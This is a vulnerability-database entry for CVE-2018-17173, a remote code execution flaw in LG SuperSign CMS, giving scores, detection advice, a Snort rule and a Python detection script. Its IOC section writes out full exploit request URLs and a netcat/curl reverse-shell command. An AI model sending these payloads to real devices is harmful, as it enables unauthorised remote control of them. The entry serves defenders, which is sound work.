CVE-2018-17173
published 2018-09-21

CVE-2018-17173: LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.

Priority: P1 (90), critical; CVSS 3.0 base score 9.8
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 56.24% (98.9th percentile)

Affected (1 range)

Vendor: lg
Product: supersign_cms
Version range / fixed in: not listed

Detection & IOCs (extracted from sources)

port: 9080
path: /qsr_server/device/getThumbnail
url: /qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20<lhost>%20<lport>%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150
url: GET /qsr_server/device/getThumbnail?sourceUri=\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//{{interactsh-url}}%2b>/tmp/f%253b\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1
command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <lhost> <lport> >/tmp/f
snort rule:
alert http $EXTERNAL_NET any -> $HOME_NET 9080 (msg:"ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/qsrserver/device/getThumbnail?sourceUri=|22|"; startswith; fast_pattern; content:"|3b|"; within:40; content:"&targetUri="; distance:0; content:"&scaleType="; distance:0; reference:url,www.exploit-db.com/exploits/45448; reference:cve,2018-17173; classtype:attempted-admin; sid:2027089; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2018_17173, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, updated_at 2024_04_13;)
  • Exploit traffic targets TCP port 9080, which is the fixed default port for LG SuperSignEZ CMS. Restrict or monitor inbound HTTP to this port.
  • Detect GET requests to /qsr_server/device/getThumbnail (or /qsrserver/device/getThumbnail) containing a quote character in the sourceUri parameter followed by shell metacharacters (semicolons, pipe characters) and the &targetUri= and &scaleType= parameters.
  • The Mirai variant exploiting this CVE is detected as IoT.Linux.MIRAI.VWISI and uses XOR key 0x04 to encrypt embedded credentials.
  • Use FOFA query title="LG SuperSign" to identify exposed LG SuperSign CMS instances on the internet for asset discovery and attack surface reduction.
  • Trend Micro DDI rule 2865 specifically covers this CVE: '2865 - CVE-2018-17173 LG Supersign Remote Code Execution - HTTP (Request)'.
  • The exploit payload drops a named pipe at /tmp/f and spawns a reverse shell via /bin/sh piped through netcat. Monitor for creation of /tmp/f and anomalous netcat processes on LG WebOS-based devices.
  • The Snort/Suricata rule (ET sid:2027089) uses /qsrserver/ (no underscore) in the URI content match, while the actual exploit path in PoC code uses /qsr_server/ (with underscore). Ensure your detection covers both variants.
  • The Nuclei template uses an out-of-band interaction (interactsh) to confirm exploitation; it will not fire in environments without external DNS/HTTP callback visibility.
  • The Metasploit module defaults to payload 'cmd/unix/reverse_netcat', requiring netcat to be present on the target. Actual attacker payloads may differ.
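As an added example (not code from this page's sources, the ET rule or any vendor tool) of the detection described in the bullets above: a small Python check over HTTP request lines that accepts either spelling of the getThumbnail path, decodes single- and double-encoded sourceUri values, and flags a quote followed by a shell metacharacter when targetUri and scaleType are also present. The sample request lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Both path spellings on this page: the PoC uses /qsr_server/, the ET rule /qsrserver/.
GETTHUMBNAIL_PATHS = {"/qsr_server/device/getThumbnail", "/qsrserver/device/getThumbnail"}
# A quote character followed later by a shell metacharacter (; | or backtick).
INJECTION_RE = re.compile(r"""['"].*[;|`]""")

def _query_params(query: str) -> dict:
    """Split on '&' only (never ';', as old parse_qs did) and percent-decode each
    value until stable, so double-encoded payloads (%253b -> %3b -> ;) normalise."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        value = unquote_plus(value)
        for _ in range(3):  # bounded: strip at most three encoding layers
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        params[unquote_plus(key)] = value
    return params

def is_getthumbnail_injection(request_line: str) -> bool:
    """True for a GET to getThumbnail (either spelling) whose sourceUri carries a
    quote followed by shell metacharacters and which also has targetUri and
    scaleType, the same parameter combination the ET rule requires."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return False
    url = urlsplit(parts[1])
    if url.path not in GETTHUMBNAIL_PATHS:
        return False
    params = _query_params(url.query)
    if "targetUri" not in params or "scaleType" not in params:
        return False
    return bool(INJECTION_RE.search(params.get("sourceUri", "")))

def scan(request_lines) -> list:
    """Indices of request lines that match the exploit pattern."""
    return [i for i, line in enumerate(request_lines) if is_getthumbnail_injection(line)]

# Constructed sample request lines (not real traffic): benign, single-encoded
# injection, double-encoded injection on the no-underscore path, wrong endpoint.
SAMPLE_REQUESTS = [
    "GET /qsr_server/device/getThumbnail?sourceUri=%2Fmedia%2Fclip.mp4&targetUri=%2Ftmp%2Fthumb%2Fa.jpg&mediaType=video&targetWidth=400&targetHeight=400&scaleType=crop HTTP/1.1",
    "GET /qsr_server/device/getThumbnail?sourceUri='%20-;id%20%3E%2Ftmp%2Fo;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop HTTP/1.1",
    "GET /qsrserver/device/getThumbnail?sourceUri=\\'%2b-%253bid%253b\\'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&scaleType=crop HTTP/1.1",
    "GET /qsr_server/device/other?sourceUri='%20;id;'&targetUri=x&scaleType=crop HTTP/1.1",
]
```

Feed `scan()` the request lines from a web-server access log or a proxy capture; the regex is deliberately loose, so treat hits as triage candidates alongside the ET rule rather than as a replacement for it.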

CVSS provenance

NVD, CVSS v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
VulnCheck: 9.8 CRITICAL